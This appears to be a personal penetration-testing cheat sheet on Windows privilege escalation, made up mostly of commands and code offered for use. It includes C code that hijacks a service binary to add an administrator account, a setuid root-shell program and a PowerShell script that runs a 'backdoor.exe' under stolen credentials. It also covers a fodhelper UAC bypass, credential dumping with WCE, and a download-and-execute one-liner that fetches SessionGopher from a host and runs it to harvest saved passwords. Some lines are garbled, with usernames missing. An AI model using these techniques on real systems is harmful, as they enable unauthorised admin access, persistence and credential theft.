Windows Escalation

New user:

Imagine we have a program that uses a file with system privs. And the program lets us r/w to the file. We can replace the file and then relaunch the program and get our new file to execute: >icacls ServiioService.exe //see that the file is NTAuth make a c file called useradd.c

#include /* system, NULL, EXIT_FAILURE */
int main (){
int i;
i = system ("net user evil Ev!lpass /add");
i = system ("net localgroup administrators evil /add");
return 0;
}

then convert to exe > i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c > move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" > net stop Serviio >wmic service where caption="Serviio" get name, caption, state, startmode >shutdown /r /t 0 >net localgroup Administrators //should see our user "evil" Batch scripts (.bat): This is a legacy windows scripting language. It has since been overshadowed by VBS and Powershell. However it still works just fine and is easy to use. A sample Batch script to open cmd: START cmd.exe

Learn more at

Unquoted Paths: Such as C:\Program Files\My Program\My Service\service.exe. Will attempt to run an executable from the following paths:(anything in green could be created and would work) C:\Program.exe C:\Program Files\My.exe C:\Program Files\My Program\My.exe C:\Program Files\My Program\My service\service.exe USBPcap: >driverquery /v //shows USBPcap as a driver # searchsploit USBPcap C:\Program Files\USBPcap> type USBPcap.inf //ching if version matches searchsploit //we then compile it for windows and run it

Manual

System info:(or sysinfo)

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

List Processes:

tasklist /SVC

Network Info:

ipconfig /all route print netstat -ano

Firewall:

netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all

Scheduled tasks:

schtasks /query /fo LIST /v

Installed apps and patch levels:

wmic product get name, version, vendor wmic qfe get Caption, Description, HotFixID, InstalledOn

Read/write files:

accesschk.exe -uws "Everyone" "C:\Program Files"

powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Mounted Disks:

mountvol

driver enum:

powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "VMware"}

Fast privesc checks:(looking to see if these are enabled//set to 1)

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Check enabled services:

net start or wmic services where 'Caption like "Remote%" and started=true' get Caption

reg query HKEY_CURRENT_USER\Software\Administrator\WinSCP

more

run file as another user

Run file as another user with powershell. echo $username = '<username>' > runas.ps1 echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1 echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1 echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1

Service hijack

powerUp and msf can do this

If we can write to the service binary directory

Adding Users/Groups

Adding a RDP group:

#net localgroup "Remote Desktop Users" <username> /add Adding admin group: #net localgroup "Administrators" <username> /add Groups: TelnetClients Remote Desktop Users Administrators

Set User ID

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); } # Compile gcc suid.c -o suid

Add user

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main () { int i; i=system ("net user /add && net localgroup administrators /add"); return 0; }

#Compile

i686-w64-mingw32-gcc -o useradd.exe useradd.c

Add a user: net user /add

Add a user to a group: #net localgroup "Remote Desktop Users" /add

UAC Bypass

Going from Admin user to Hi Integrity Admin(able to do more commands without UAC stopping us): //check current group >whoami /groups //escalate then check again >powershell.exe Start-Process cmd.exe -Verb runAs Windows 10 build 1709: >C:\Windows\System32\fodhelper.exe >cd C:\Tools\privilege_escalation\SysinternalsSuite >sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe //check that autoelevate is set to true //if so then look at pages 546-554

Pass hunting

wce:

Windows Credentials Editor (WCE)70 is a security tool that allows one to perform several attacks to obtain clear text passwords and hashes from a compromised Windows host. Among other things, WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on the target system such as msv1_0.dll, kerberos.dll, and digest.dll.

C:>wce -w

Session gopher:

A Fireeye ps1 tool to search a system for passwords like telnet, winscp, rdp, etc

//download tool to kali

#wget htps://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1

//Set up http server to transfer file and run it on remote target

#python -m SimpleHTTPServer 80

powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString('http://192.168.13.71/SessionGopher.ps1'); Invoke-SessionGopher -Thorough